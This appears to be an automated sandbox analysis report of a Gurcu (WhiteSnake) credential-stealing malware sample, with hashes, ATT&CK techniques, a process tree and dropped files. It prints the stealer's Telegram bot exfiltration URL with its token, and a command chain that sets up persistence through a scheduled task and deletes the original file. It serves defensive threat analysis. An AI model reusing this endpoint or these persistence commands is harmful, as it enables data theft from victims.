gurcu | 2869db18f346049bcc9e378a77ed809fd9caad2fd2bd4d9f58d6e728c784b3eb

Analysis

max time kernel
154s
max time network
181s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
05/05/2023, 20:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f19126b02be0b331982e041dc9bcad51.exe
Size

223KB
MD5

f19126b02be0b331982e041dc9bcad51
SHA1

10ab04a6f24ce4540a564041375d8275a691e409
SHA256

2869db18f346049bcc9e378a77ed809fd9caad2fd2bd4d9f58d6e728c784b3eb
SHA512

e6158c6c1563ff3f013b97c0b5da7b5f3301657b948ddb1198ebaea7ce5fc3a9c9f3f449646f45c070514e8796e6315a2afaab7894ba20e3b857a5dc504d093c
SSDEEP

3072:fvfoUJQCw+d+Uoj9DVbDWb0Cdfc6mdSCFytxpNS17e+8TNBfxz9l:fvfoOQHelqJbD4HJe7FytVSle+8TxX

Score

10^/10

gurcu spyware stealer

Malware Config

Extracted

Family

gurcu

https://api.telegram.org/bot5975822207:AAFJtzAlzLoF8RfkpKUagQJGRi0ksib6w3g/sendMessage?chat_id=1396661331

Signatures

Gurcu, WhiteSnake
Gurcu is a malware stealer written in C#.
stealer gurcu

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation	f19126b02be0b331982e041dc9bcad51.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2548970870-3691742953-3895070203-1000\Control Panel\International\Geo\Nation	f19126b02be0b331982e041dc9bcad51.exe

Executes dropped EXE 3 IoCs

pid	Process
3364	f19126b02be0b331982e041dc9bcad51.exe
1620	f19126b02be0b331982e041dc9bcad51.exe
2516	tor.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
39	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2356	schtasks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3444	PING.EXE

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3364	f19126b02be0b331982e041dc9bcad51.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	5060	f19126b02be0b331982e041dc9bcad51.exe
Token: SeDebugPrivilege	3364	f19126b02be0b331982e041dc9bcad51.exe
Token: SeDebugPrivilege	1620	f19126b02be0b331982e041dc9bcad51.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 5060 wrote to memory of 616	5060	f19126b02be0b331982e041dc9bcad51.exe	86
PID 5060 wrote to memory of 616	5060	f19126b02be0b331982e041dc9bcad51.exe	86
PID 616 wrote to memory of 4956	616	cmd.exe	88
PID 616 wrote to memory of 4956	616	cmd.exe	88
PID 616 wrote to memory of 3444	616	cmd.exe	89
PID 616 wrote to memory of 3444	616	cmd.exe	89
PID 616 wrote to memory of 2356	616	cmd.exe	90
PID 616 wrote to memory of 2356	616	cmd.exe	90
PID 616 wrote to memory of 3364	616	cmd.exe	91
PID 616 wrote to memory of 3364	616	cmd.exe	91
PID 1620 wrote to memory of 4652	1620	f19126b02be0b331982e041dc9bcad51.exe	99
PID 1620 wrote to memory of 4652	1620	f19126b02be0b331982e041dc9bcad51.exe	99
PID 1620 wrote to memory of 2516	1620	f19126b02be0b331982e041dc9bcad51.exe	101
PID 1620 wrote to memory of 2516	1620	f19126b02be0b331982e041dc9bcad51.exe	101

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\f19126b02be0b331982e041dc9bcad51.exe
"C:\Users\Admin\AppData\Local\Temp\f19126b02be0b331982e041dc9bcad51.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "f19126b02be0b331982e041dc9bcad51" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\NET.Framework\f19126b02be0b331982e041dc9bcad51.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\f19126b02be0b331982e041dc9bcad51.exe" &&START "" "C:\Users\Admin\AppData\Local\NET.Framework\f19126b02be0b331982e041dc9bcad51.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:616
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:4956
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:3444
- - C:\Windows\system32\schtasks.exe
    schtasks /create /tn "f19126b02be0b331982e041dc9bcad51" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\NET.Framework\f19126b02be0b331982e041dc9bcad51.exe" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:2356
- - C:\Users\Admin\AppData\Local\NET.Framework\f19126b02be0b331982e041dc9bcad51.exe
    "C:\Users\Admin\AppData\Local\NET.Framework\f19126b02be0b331982e041dc9bcad51.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3364

C:\Users\Admin\AppData\Local\NET.Framework\f19126b02be0b331982e041dc9bcad51.exe
C:\Users\Admin\AppData\Local\NET.Framework\f19126b02be0b331982e041dc9bcad51.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1620
- C:\Windows\System32\tar.exe
  "C:\Windows\System32\tar.exe" -xvzf "C:\Users\Admin\AppData\Local\Temp\tmp3033.tmp" -C "C:\Users\Admin\AppData\Local\i86t5yhbwx"
  2⤵
  PID:4652
- C:\Users\Admin\AppData\Local\i86t5yhbwx\tor\tor.exe
  "C:\Users\Admin\AppData\Local\i86t5yhbwx\tor\tor.exe" -f "C:\Users\Admin\AppData\Local\i86t5yhbwx\torrc.txt"
  2⤵
  - Executes dropped EXE
  PID:2516

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\f19126b02be0b331982e041dc9bcad51.exe.log

Filesize
1KB

MD5
fc1be6f3f52d5c841af91f8fc3f790cb

SHA1
ac79b4229e0a0ce378ae22fc6104748c5f234511

SHA256
6da862f7c7feffca99cd58712ece93928c6ca6aed617f5d8c10a4718eaa2a910

SHA512
2f46165017309ee1a0c1b23e30a71e52e86ad8933e2649bf58c3f4628c5aa75659f5b8f6be32c2882f220b2f3ff2fd50d8766bf0a3708c94c2c634c051a05ea6

Download Submit
C:\Users\Admin\AppData\Local\NET.Framework\f19126b02be0b331982e041dc9bcad51.exe

Filesize
223KB

MD5
f19126b02be0b331982e041dc9bcad51

SHA1
10ab04a6f24ce4540a564041375d8275a691e409

SHA256
2869db18f346049bcc9e378a77ed809fd9caad2fd2bd4d9f58d6e728c784b3eb

SHA512
e6158c6c1563ff3f013b97c0b5da7b5f3301657b948ddb1198ebaea7ce5fc3a9c9f3f449646f45c070514e8796e6315a2afaab7894ba20e3b857a5dc504d093c

Download Submit
C:\Users\Admin\AppData\Local\NET.Framework\f19126b02be0b331982e041dc9bcad51.exe

Filesize
223KB

MD5
f19126b02be0b331982e041dc9bcad51

SHA1
10ab04a6f24ce4540a564041375d8275a691e409

SHA256
2869db18f346049bcc9e378a77ed809fd9caad2fd2bd4d9f58d6e728c784b3eb

SHA512
e6158c6c1563ff3f013b97c0b5da7b5f3301657b948ddb1198ebaea7ce5fc3a9c9f3f449646f45c070514e8796e6315a2afaab7894ba20e3b857a5dc504d093c

Download Submit
C:\Users\Admin\AppData\Local\NET.Framework\f19126b02be0b331982e041dc9bcad51.exe

Filesize
223KB

MD5
f19126b02be0b331982e041dc9bcad51

SHA1
10ab04a6f24ce4540a564041375d8275a691e409

SHA256
2869db18f346049bcc9e378a77ed809fd9caad2fd2bd4d9f58d6e728c784b3eb

SHA512
e6158c6c1563ff3f013b97c0b5da7b5f3301657b948ddb1198ebaea7ce5fc3a9c9f3f449646f45c070514e8796e6315a2afaab7894ba20e3b857a5dc504d093c

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp3033.tmp

Filesize
13.3MB

MD5
89d2d5811c1aff539bb355f15f3ddad0

SHA1
5bb3577c25b6d323d927200c48cd184a3e27c873

SHA256
b630008f6d3887793d48b87091e56691e292894dd4fa100dc4a418a2f29dcc12

SHA512
39e576124c54143520c5435a2ef9b24506131e13403489c0692f09b89135015d611c4988d4772f8a1e6557fa68b4667d467334461009cee8c2227dfc3e295289

Download Submit
C:\Users\Admin\AppData\Local\i86t5yhbwx\data\cached-microdesc-consensus.tmp

Filesize
2.3MB

MD5
cf90fa3a9a4f38a4bc7062852dec45ba

SHA1
0ba595a323aca695c9c57a5e0b63b879d9feabfa

SHA256
0851ef13b0a8c84cbffaacfa40442d3cd1bfb47e1114fbe74e2a42fd7a6e6131

SHA512
f77a9aaf72bf408eec09bd60d82fde0b4190cbaae2c5e74b8c577f19050a5e5063c2a0e7b78d70ee2fa63e86584a0bd8106b8d0e953bf59dc80eb1caabee410f

Download Submit
C:\Users\Admin\AppData\Local\i86t5yhbwx\data\cached-microdescs.new

Filesize
4.4MB

MD5
5e15435ac25afde081a92a44e46e4434

SHA1
3dc764a8731ca91908147900738e4306e4d908ce

SHA256
010e82e1f0685857c52839ceb190249edd9641379fbe4f85d88c3d6b5e7b253f

SHA512
92020171241121dc0a476a6ef0eed71e68317af9d305cfc2b19ceca6387834e86fce0806eeb2651ba3e93d5a0ce0a77054c7227a5e62768684939c36b79bd3cc

Download Submit
C:\Users\Admin\AppData\Local\i86t5yhbwx\host\hostname

Filesize
64B

MD5
ed5511032287e9c7a2b13d4ac9f707e6

SHA1
7d0549a995bfe70f4aeaa0f37ab27b7950d8605d

SHA256
9f4b4a8e213e7e9abaafd66671fadf62c7e8306a75d4544f34ac4121da3d0169

SHA512
319488679e131af5dbb22fb301e6ef180a2b234cc7a8dbe98d02dc71669d6847197663eaac106d3841bed9f092e437239c31fb09863a552945de430b4f7778ee

Download Submit
C:\Users\Admin\AppData\Local\i86t5yhbwx\port.dat

Filesize
4B

MD5
07f75d9144912970de5a09f5a305e10c

SHA1
11ff2346b384b19190353d5d04521327b7486e6e

SHA256
0db1804a6beaabd4686ed1f9a9763427df438dafe97e3a2a761e1db81405f538

SHA512
98140230395fd2b9515eb073e5c0261057ee2be9a608f5194b95e8b2ff406d9fe60d44bb78bb2b767a66bc20ad84920048505b7a819539fdfd2c8500cf66fbfb

Download Submit
C:\Users\Admin\AppData\Local\i86t5yhbwx\tor\tor.exe

Filesize
7.4MB

MD5
88590909765350c0d70c6c34b1f31dd2

SHA1
129b27c3926e53e5df6d44cc6adf39c3a8d9ebf7

SHA256
46fe244b548265c78ab961e8f787bc8bf21edbcaaf175fa3b8be3137c6845a82

SHA512
a8af08d9169a31a1c3419d4e6e8fbe608c800d323840563b5a560d3e09e78a492201f07cc0d3864efbff8ad81e59885fc43a6b749e0a3377aa8555df258af192

Download Submit
C:\Users\Admin\AppData\Local\i86t5yhbwx\tor\tor.exe

Filesize
7.4MB

MD5
88590909765350c0d70c6c34b1f31dd2

SHA1
129b27c3926e53e5df6d44cc6adf39c3a8d9ebf7

SHA256
46fe244b548265c78ab961e8f787bc8bf21edbcaaf175fa3b8be3137c6845a82

SHA512
a8af08d9169a31a1c3419d4e6e8fbe608c800d323840563b5a560d3e09e78a492201f07cc0d3864efbff8ad81e59885fc43a6b749e0a3377aa8555df258af192

Download Submit
C:\Users\Admin\AppData\Local\i86t5yhbwx\torrc.txt

Filesize
218B

MD5
2fc31937bd5f917af0603d890afc2435

SHA1
0d7c35f266584c830a18f1f7b33a2278fceef02a

SHA256
1f0bdaa2317a9089bd1f51a0de0aa76ce870da2820e9af25e6ab027c015ac01c

SHA512
e9fe4bcce4d790e8384b4f872d16ea2f4dd578e1d4ff7a2104324655de8dfea6bbf9e8b324fa07f335a682b3a470f64d99a1be759426c2e886f3fdf40893257d

Download Submit
memory/1620-148-0x00000243BC270000-0x00000243BC280000-memory.dmp

Filesize
64KB

Download
memory/1620-151-0x00000243BC270000-0x00000243BC280000-memory.dmp

Filesize
64KB

Download
memory/3364-145-0x0000015D39FA0000-0x0000015D39FB0000-memory.dmp

Filesize
64KB

Download
memory/3364-143-0x0000015D39FA0000-0x0000015D39FB0000-memory.dmp

Filesize
64KB

Download
memory/5060-133-0x000002019FE20000-0x000002019FE5C000-memory.dmp

Filesize
240KB

Download
memory/5060-135-0x00000201A1C00000-0x00000201A1C10000-memory.dmp

Filesize
64KB

Download
memory/5060-134-0x00000201A1C00000-0x00000201A1C10000-memory.dmp

Filesize
64KB

Download